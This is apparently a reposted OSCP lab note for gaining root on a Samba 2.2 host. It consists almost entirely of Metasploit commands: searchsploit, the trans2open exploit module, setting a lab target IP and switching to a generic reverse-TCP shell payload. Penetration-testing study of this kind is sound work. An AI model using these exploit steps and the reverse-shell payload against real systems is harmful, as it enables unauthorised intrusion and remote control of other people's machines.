阅读 108

OSCP Security Technology - Gaining Root with Metasploit

OSCP Security Technology - Gaining Root with Metasploit

Analysis nmap scanning result.

searchsploit samba 2.2 

msfconsole
search trans2open
use exploit/linux/samba/trans2open
show options

set rhost 192.168.2.28
show targets
exploit

We need change the payload setting.

show options
set payload generic/shell_reverse_tcp
exploit

原文:https://www.cnblogs.com/keepmoving1113/p/14979824.html

文章分类
代码人生
版权声明:本站是系统测试站点,无实际运营。本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 XXXXXXo@163.com 举报,一经查实,本站将立刻删除。
相关推荐